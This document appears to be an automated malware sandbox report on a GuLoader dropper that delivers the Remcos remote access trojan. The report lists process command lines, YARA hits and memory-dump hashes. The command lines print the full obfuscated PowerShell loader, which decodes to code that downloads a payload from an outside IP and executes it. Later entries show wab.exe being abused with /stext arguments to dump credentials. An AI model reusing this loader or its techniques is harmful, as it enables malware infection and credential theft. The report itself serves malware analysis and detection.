mbelfae Meste sAntimettCasca,o- SpritbP Banesaagruntsct Omsalgh Halvku m.narc$MarchpaSWiederhtFeuderva PolyphnReballodO,eratiaUnderskrCrammeldMenneskiraflendsFjendtla NongymtRandomniFremmedoTilintenBaculess,ychosi)Afkor.e ') ;Sarcophilus (Brassart 'Songsm $ TurritgAnti,rol upmanwo KravlebIsomalta Hamatal Omd ni:ReticulICounternVebogenfHyperdioSaltingrBlawingm Avle.ya ntervotAfgoerei DumpedcResurseaCoalise2 Ancres0 Diffra0Borityj=Reassur$Soranskg,uckhoulMauricioTuftsblbOutrhymaGazettel Standa:InterioB tolerarPatriotiTostadol .semafl SorehoiNear,rdager.temnAreopagcdiaxiali FetisheStitchwsVeinle,+ Havned+Teg,ede%Stenoty$OpraabtBIngui olSmutturoVeludvio Ebbiskd trfferrMacera,oAnisoptoFonetiktIns,rin.PlateaucDecimaloAdu ticuSurinamnOwnabletRaklebr ') ;$Skrbeligt157=$Bloodroot[$Informatica200];}$Kontekstfri=314175;$Untastefulness=30570;Sarcophilus (Brassart 'Outpush$ ReopergFolketilVerfendo Hyacinbno.answaAcrimonlsailo.i:AromatiFCaciqueoInterner Gyptolb FljeneyWithanitAulaegutC ukkere.sonnrrrSaltvan breamun=Ste,mep InclusGDisordeeCirkulatno voli-AfglatcCStan.aroI,ereskn Morf.rtAsker,geCumaruonsulta.etF.imure Sydsles$MicroanSAnteprotEnklesta SwartynS ecifid H.pertaHovedkarIlddaabdCotyla,iSeromans SysletaBalsamitExosmosiMarlingo.kjtebanPanteresUnchari ');Sarcophilus (Brassart 'Udekamp$ monon gF,emkallSulfoneokolibakbvidnefraSystemsl Scilli:L,censuRSpe.dere UnencunN crotogSnirkleu liniese .ecert Castrat=Fgte,ne Unsupp[ Ghe toS StudieyCinderis.rotosaton.matoeUfoenanmStnknin. 
SwizzlC Thayneo,uillain AffektvWuggisheFedestirDkslastt Sorc r]grundpr: Stim.l:AdventuF.ragmenrPr tovuoSk.oldlm.rukkenBervilseaHypoptesTubercueAfounde6Paspalu4BlddeleSTrach,mt Abla,irAmphoroiOvers,rnRegnemsg Hnenth(.anseor$ .ystmoFAstronooF emskrrGothshjbcombustyAccentetInhumertSkema,ieWallabyrEntea,l).inigol ');Sarcophilus (Brassart 'Inte va$Uneatingti etallNonextioAntispibFingersaSkj.ebalOpsigel:A teriicsgernebo Ut lism.anktbem Forkv.eAssertrrGrundbgc Supe diPikkenda Radi.blThorvaliTerrorizUnl gisiProjektnGenskabgKomedie Wyliesk=Buelamp Panikke[Unc mprSBartendyDiabetes LangtitnonexuleGa,erskmBaar.rf. AviatoT UnjoureTarsioix FlawfltAl ergi.UnfrangEPlisseenLysreklcKilendeoA tenuad dtungeiHar anhnMinbugsg pixpap]S,iklag:Obconic:Misi teAHeksen.SCounterC.tjlernIStarkypIPaalgsc.ModigstGBart nde Pallout M,nunaSReplik,tvggenstrSabbatii StruggnUdstykkgRagtim.(bladder$.elefonR,rthogreItineranAfdoedtgRemateduRadioakeMisfeat)Datauhe ');Sarcophilus (Brassart 'Bailage$Scler.sgBes vdol nidudioKanutudb eripeaSintri.lCa,ital:Daane oUUdlbstinMateriacP otoplrSalatoly ramatusSynchrotSangu ma capryllApastrolSti,hediKo,eplazPoloskjaTil ntebGoodwiliServi pl enecoliTypehustAffaldsiGavottieA,tomatsSpandre=Tilstrm$ Fejlrec,omputeoMis.etrmInva idmTaflerte For lirLderpuncUl.iereiArgumenaActinull SculleiGr.bworzEspad iiBrugstyn Boble gTrammel. Digamms Ge,tatu hamfebReglemesLer aretAmar,nerSchoo.siFysiurgnFladbl,gHerskab(En.erso$La.aniaKFngselsoSnderlenBilineatU,blusheUnpitiek S,reflsHeikesltHera lefTillbe.rS,elteriEpiphys,Morbro $ ActinoUDotlikenIngravet Skrivea SubmersMystifitTraitoreLetterifTenen.uu lleapplNonrespn Mismo eDemeritsPersonasarsenic)Rhinsku ');Sarcophilus $Uncrystallizabilities;"
                    Imagebase:0x7ff741d30000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:01:50:03
                    Start date:02/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff75da10000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:7
                    Start time:01:50:04
                    Start date:02/07/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
                    Imagebase:0x7ff74bb30000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:14
                    Start time:01:50:12
                    Start date:02/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: 
Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnVivariidPrimasse,ruitbesStetikkiHjemstatSnaph neSkrukh.)Meretr. 
');Sarcophilus (Brassart ' abong$UtmmeligDragelsl stak,eo hoirwib WartleaBffengolBasebal:Fejl,asBParodiel SkyldsoCopo,ymo PensiodDdlkkerr Lavesto HalvenoTvangsftAde,omo= Ue enn$DrblernSArbejdsk UanselrBalle.eb ForvrieKulle slover.ari Skinang Fuldbat Babasc1.roathl5Spoonb,7 Antidr.BloodtesAfske.spOvercomlBidragsiCrot.nttT,ansve( Ordnyo$ingenirC Snert,oBarnedan Pred.bsUgrssetc recoloiB.rdolpo,xtermin FaradiaAfdelinbRygelselUhaandteCestoshnGlobalseBeneficsAssu.ersTeddip )Nonrege ');Sarcophilus (Brassart 'Elvrks,[MarkedsNMerisise talerstLeasing.SonshipSAvertere Forsder,anidiavCrewmemi TopnglcKonomsaeTr.vlemPRe,ervioInternai nonsabnOpercultddstegnM SeborramumbudgnInfusioaArchiepgUnderdeeOplysnir Bu.lhe]Strolls: Fal.ib: parinS BootsteVimineocStanduruRiantagrBeg.deliBaudrattTipier yParticuPUdearberPhenylao Non.irt Fedtsmo untrifcShamecaoTrf,erel Styreh Crystal=Stroppi Specif [.ilodenNHelaafke MnterntBrednin.NonpathS Pa.ticeCollinscboganm uBedsp.or,rndeviiInkassotBanesaay irreduP toptyvrBygge ao HighlatShog.unoD.theryc kammenoBadel.glNdvendiTOpdatery MglingpbrachiaeEl.ctro] Orange:Scaletl:CrowdedTOps.revlPapirstsVenomos1Forvund2Mandril ');$Skrbeligt157=$Bloodroot[0];$Afguder= (Brassart 'Krohold$ EloinigholocenlGaveafgoEctomerb TerritaRenunculContain: AflvniH Emanc,iKeyma lgTillaegh ValidebR usenuaMeta,ralunbundll linguisKamera,=EfterliNOutsavoe ombazw Synneu-gedebolOTopcoatbfrsteopjvar.edneEkstempc KlemtvtCheekpi vindic SZizyphuyTimonias krydsmtAn tomie Raffl,mUnderbe. 
maskinNDep,ecieYvindsptMon.oli.KvilibrWDakoitieLyrer,ebNonfixaCClinkstlDemimoniBriseiserationenTilstedt');$Afguder+=$Inexertion[1];Sarcophilus ($Afguder);Sarcophilus (Brassart ' Stngen$.efektiH olphiniChristigH.farveh AfbenybExtrasea StosnilUnderbulBasnglesVrdia,g.EncreasHAppropieEft,rbeaSuggestdFi palueHypermer,askekus Skr.ld[ hroni$Sta.usoCAnkelsoaHandelsp kanderkHuovertiOrientenUdvikli] Benzoa=Moyleu,$Sund,edDAsthorieT.unkfil Azollae P,rtystNoce ceiUn,ervivTachygeeSlipove ');$breplansbaad=Brassart 'inholdi$HalopsyHStellari BibliogKi skejh Longhebcylindra erohylMbel,ablNiveau.sPlane,a.BlthaveDJagtgstoPseudoswthe mogn CavlinlTintefeoDingenoaRykkerbdReperc,F .yngdeiLgehuselUnsupere ,amliv( El.ond$Stirre,SRe,tartkKi,dredrSlukninb West.aeShielddlShoecrai KonfiggFyringstHandels1 Perthi5Sar,ens7 Sniffi, Sympat$MassesuS OmlasttBo,anopaRelendinEnrheumdTran,itaMindsterBevgeapdInf,atiiKokosndsPokinglaContaint LooingiDelegatoTetanolnHomotrasu smidn) Dipt r ';$Standardisations=$Inexertion[0];Sarcophilus (Brassart 'Undece.$CotraitgvippedelUnderpuoRejoicibFrilanda S,ekodlNontran:Voluntes Ko.plet ElvesqaBlomst v Wh,tsolPaedophyNrmertrgTrkproctFrak,ioeAkselafrh,tzerssRepract=jespejl(tipbartT S.rtkueStandars,narchitFagacea- colandP Delsteasalvad tGl,nsnuh Norman Vrksted$Margi sSBaginditGolftrjaSuprasqnHema oxdCanthutaTsesantr NoncomdEibrittiParodics SemestaAchaemet CriminiDisgraco Thre,tnAggregasErg,ter)tempori ');while (!$stavlygters) {Sarcophilus (Brassart ' Sonsie$Konservg Crocial BostnioOffervibFloragraskriveml Lum.er:EksisteH S,ikkev Un.erbn,ireraue DeposarBogma,k=Snapsfl$PreaccutImp nitrAcetylsuArticuleAbsorbe ') ;Sarcophilus $breplansbaad;Sarcophilus (Brassart 'Rgerli,SSm thertChalqueaEctocunrD.pravetrebroac-Ungt liSYver,idlGttevrke Aktualegen ralpOverfla F.brika4Vegetat ');Sarcophilus (Brassart 'Tchapan$PlovskrgAircondlGangninoGi termbOvervinaRigsarklVaabenm:,ansslus ProgratOpgrelsaSethprdv TrolovlKonsuley Me.tingDenyerat Forep eAu ocarrreinvessSpaltet=Transce(G,rhamiT 
mbelfae Meste sAntimettCasca,o- SpritbP Banesaagruntsct Omsalgh Halvku m.narc$MarchpaSWiederhtFeuderva PolyphnReballodO,eratiaUnderskrCrammeldMenneskiraflendsFjendtla NongymtRandomniFremmedoTilintenBaculess,ychosi)Afkor.e ') ;Sarcophilus (Brassart 'Songsm $ TurritgAnti,rol upmanwo KravlebIsomalta Hamatal Omd ni:ReticulICounternVebogenfHyperdioSaltingrBlawingm Avle.ya ntervotAfgoerei DumpedcResurseaCoalise2 Ancres0 Diffra0Borityj=Reassur$Soranskg,uckhoulMauricioTuftsblbOutrhymaGazettel Standa:InterioB tolerarPatriotiTostadol .semafl SorehoiNear,rdager.temnAreopagcdiaxiali FetisheStitchwsVeinle,+ Havned+Teg,ede%Stenoty$OpraabtBIngui olSmutturoVeludvio Ebbiskd trfferrMacera,oAnisoptoFonetiktIns,rin.PlateaucDecimaloAdu ticuSurinamnOwnabletRaklebr ') ;$Skrbeligt157=$Bloodroot[$Informatica200];}$Kontekstfri=314175;$Untastefulness=30570;Sarcophilus (Brassart 'Outpush$ ReopergFolketilVerfendo Hyacinbno.answaAcrimonlsailo.i:AromatiFCaciqueoInterner Gyptolb FljeneyWithanitAulaegutC ukkere.sonnrrrSaltvan breamun=Ste,mep InclusGDisordeeCirkulatno voli-AfglatcCStan.aroI,ereskn Morf.rtAsker,geCumaruonsulta.etF.imure Sydsles$MicroanSAnteprotEnklesta SwartynS ecifid H.pertaHovedkarIlddaabdCotyla,iSeromans SysletaBalsamitExosmosiMarlingo.kjtebanPanteresUnchari ');Sarcophilus (Brassart 'Udekamp$ monon gF,emkallSulfoneokolibakbvidnefraSystemsl Scilli:L,censuRSpe.dere UnencunN crotogSnirkleu liniese .ecert Castrat=Fgte,ne Unsupp[ Ghe toS StudieyCinderis.rotosaton.matoeUfoenanmStnknin. 
SwizzlC Thayneo,uillain AffektvWuggisheFedestirDkslastt Sorc r]grundpr: Stim.l:AdventuF.ragmenrPr tovuoSk.oldlm.rukkenBervilseaHypoptesTubercueAfounde6Paspalu4BlddeleSTrach,mt Abla,irAmphoroiOvers,rnRegnemsg Hnenth(.anseor$ .ystmoFAstronooF emskrrGothshjbcombustyAccentetInhumertSkema,ieWallabyrEntea,l).inigol ');Sarcophilus (Brassart 'Inte va$Uneatingti etallNonextioAntispibFingersaSkj.ebalOpsigel:A teriicsgernebo Ut lism.anktbem Forkv.eAssertrrGrundbgc Supe diPikkenda Radi.blThorvaliTerrorizUnl gisiProjektnGenskabgKomedie Wyliesk=Buelamp Panikke[Unc mprSBartendyDiabetes LangtitnonexuleGa,erskmBaar.rf. AviatoT UnjoureTarsioix FlawfltAl ergi.UnfrangEPlisseenLysreklcKilendeoA tenuad dtungeiHar anhnMinbugsg pixpap]S,iklag:Obconic:Misi teAHeksen.SCounterC.tjlernIStarkypIPaalgsc.ModigstGBart nde Pallout M,nunaSReplik,tvggenstrSabbatii StruggnUdstykkgRagtim.(bladder$.elefonR,rthogreItineranAfdoedtgRemateduRadioakeMisfeat)Datauhe ');Sarcophilus (Brassart 'Bailage$Scler.sgBes vdol nidudioKanutudb eripeaSintri.lCa,ital:Daane oUUdlbstinMateriacP otoplrSalatoly ramatusSynchrotSangu ma capryllApastrolSti,hediKo,eplazPoloskjaTil ntebGoodwiliServi pl enecoliTypehustAffaldsiGavottieA,tomatsSpandre=Tilstrm$ Fejlrec,omputeoMis.etrmInva idmTaflerte For lirLderpuncUl.iereiArgumenaActinull SculleiGr.bworzEspad iiBrugstyn Boble gTrammel. Digamms Ge,tatu hamfebReglemesLer aretAmar,nerSchoo.siFysiurgnFladbl,gHerskab(En.erso$La.aniaKFngselsoSnderlenBilineatU,blusheUnpitiek S,reflsHeikesltHera lefTillbe.rS,elteriEpiphys,Morbro $ ActinoUDotlikenIngravet Skrivea SubmersMystifitTraitoreLetterifTenen.uu lleapplNonrespn Mismo eDemeritsPersonasarsenic)Rhinsku ');Sarcophilus $Uncrystallizabilities;"
                    Imagebase:0xc10000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1716933830.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1726977424.00000000088B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.1727059954.000000000BAFD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    Target ID:15
                    Start time:01:50:13
                    Start date:02/07/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
                    Imagebase:0x410000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:17
                    Start time:03:36:42
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:false

                    Target ID:20
                    Start time:03:37:03
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:21
                    Start time:03:37:03
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:22
                    Start time:03:37:03
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:23
                    Start time:03:37:03
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:24
                    Start time:03:37:03
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: tPq
                      • API String ID: 0-789928099
                      • Opcode ID: 3347cea6c3ecc25a8b826933c9e4641479f5c237c6cf9db305af5e2e910a25db
                      • Instruction ID: d080da5bbb4c4f89a401fe3706d8b429dc30fbb76ab728bab54f56578fae3de7
                      • Opcode Fuzzy Hash: 3347cea6c3ecc25a8b826933c9e4641479f5c237c6cf9db305af5e2e910a25db
                      • Instruction Fuzzy Hash: 0E4126B0B003059FDB148F24D891BAABBF3AF85280F19885AEC059F2D1DB71DC51C7A5
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6d9e0003ebd2984ab69f044d4e0bf081c7097729d7461ce4b180ff95a91d95e0
                      • Instruction ID: 905037128991b4def0f174a7c6f1acd8ace2488d255c57793bf0f59008699c4e
                      • Opcode Fuzzy Hash: 6d9e0003ebd2984ab69f044d4e0bf081c7097729d7461ce4b180ff95a91d95e0
                      • Instruction Fuzzy Hash: 3D1249B4A00305DFDB14CB58C950BA9BBB2FB85754F64C5A9E9099F391CB72EC81CB81
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a82edab662c717f953835e74376ba4e6f9c6c2af5653fe90079658b541d3966d
                      • Instruction ID: aff175714e117626ab8a26b16dc37e370f6a98f9bbbcbf985ca7a33989f90294
                      • Opcode Fuzzy Hash: a82edab662c717f953835e74376ba4e6f9c6c2af5653fe90079658b541d3966d
                      • Instruction Fuzzy Hash: 73D11B34A052189FEB15CF98D884AADFBB2FF89310F188555E445AB3A5C735ED82CF90
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2ab7ccce6953a96424d0be89a44a125e930e26a400e47e2983d227b741e2de79
                      • Instruction ID: b51ac206b92e23a155326d1586011a31c11adb74ab58d8a59f545f1cf8730adb
                      • Opcode Fuzzy Hash: 2ab7ccce6953a96424d0be89a44a125e930e26a400e47e2983d227b741e2de79
                      • Instruction Fuzzy Hash: C5D1F634A012189FEB14CF99D484A9DBBF2FF88310F288559E948AB355C731AD82CF95
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7b7d7c658d185ad752aa97ddc15bdec0ad7d4fa16737d0d71b7dea2ee20c7bcc
                      • Instruction ID: 4006299a9218e7040bd384fe3026b410ef4af864c57dbd4927a9db807bbd469a
                      • Opcode Fuzzy Hash: 7b7d7c658d185ad752aa97ddc15bdec0ad7d4fa16737d0d71b7dea2ee20c7bcc
                      • Instruction Fuzzy Hash: F0C17F35A012089FEB14DFA4D584A9DBBF6FF85310F194559D806AF3A6CB34ED49CB80
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0b8c907ecbb62bae7be0e421e76f9fa29396c8a601b1155b876b98db4cbe7de4
                      • Instruction ID: 18312cf6b76e37a7cbcf7a2a1d1e985d42ad8fc9b38cec9429fd24bc06c5bbac
                      • Opcode Fuzzy Hash: 0b8c907ecbb62bae7be0e421e76f9fa29396c8a601b1155b876b98db4cbe7de4
                      • Instruction Fuzzy Hash: D4B17070E0130A8FEB64CFA8D99179DBBF2AF48314F188529D815EB294EB749845DF81
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7666af85cfca3b4f9e3564861ce4309b9329682911d8027e85227843116c30ef
                      • Instruction ID: 8aac7af14dbdc5ace2b8b54486f3d00453224556c967d755b2af2083072f5717
                      • Opcode Fuzzy Hash: 7666af85cfca3b4f9e3564861ce4309b9329682911d8027e85227843116c30ef
                      • Instruction Fuzzy Hash: 249181B0B102049FE714DB54C854BAEBBE2AF89744FA0C469DD05AF791CB71EC81CB65
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1724652204.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7750000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eaf65b007a317f2a3b7684007814ac9134969de0790d73fbe066828f61be4ff9
                      • Instruction ID: 337d81f2c274040d5c2b7974d79af722e4b3d628544dba81e0ffc974e154aa30
                      • Opcode Fuzzy Hash: eaf65b007a317f2a3b7684007814ac9134969de0790d73fbe066828f61be4ff9
                      • Instruction Fuzzy Hash: D0917EB0B102049FD714DB54C854BADBBF2AF86754FA0C469E905AB791CB71EC81CB61
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1714091363.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_3000000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 05387efa11e32a3fe74c82cc565f8287398dbb251ced7f9f02b354bd436e1476
                      • Instruction ID: b6e15d543cc8e3553a4bdebfb660899883e4852508fa88bdbc25bd6f9b38a8ca
                      • Opcode Fuzzy Hash: 05387efa11e32a3fe74c82cc565f8287398dbb251ced7f9f02b354bd436e1476
                      • Instruction Fuzzy Hash: 7A818334A02244DFDB15DFA4D484AADBBF2FF89314F1884A9E4459B3A2CB35EC85CB51
                      Memory Dump Source
